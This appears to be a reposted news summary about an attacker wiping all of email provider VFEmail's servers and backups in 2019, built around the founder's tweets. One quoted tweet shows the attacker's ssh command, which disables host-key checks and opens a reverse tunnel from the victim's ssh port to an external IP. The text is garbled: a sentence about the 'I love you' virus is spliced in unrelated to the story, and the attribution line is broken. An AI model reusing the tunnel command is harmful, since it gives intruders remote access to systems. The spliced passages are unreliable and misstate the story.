
“Catastrophic” hack on email provider destroys almost two decades of data


SOURCE: https://arstechnica.com/information-technology/2019/02/catastrophic-hack-on-email-provider-destroys-almost-two-decades-of-data/
Summary

Email provider VFEmail said it has suffered a catastrophic destruction of all of its servers by an unknown assailant who wiped out almost two decades' worth of data and backups in a matter of hours.

“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001.

via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019

The damage, Romero reported, extended to VFEmail’s “entire infrastructure,” including mail hosts, virtual machine hosts, and a SQL server cluster.

The virus got its name because it was transmitted in emails with the subject “I love you.” The service aimed to offer a better email experience by scanning messages for malware on the server.

“We strive to build an economical and redundant system, to provide our users with as much uptime as possible,” VFEmail’s about page said.

To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.
— Havokmon (@Havokmon) February 12, 2019

He went on to say that the attacker used multiple means of access onto the VFEmail infrastructure and as a result, it wasn’t clear two-factor authentication would have stopped the intrusion.

“2FA only works if the access method was via authentication, as opposed to exploit,” he explained.

As said here by Dan Goodin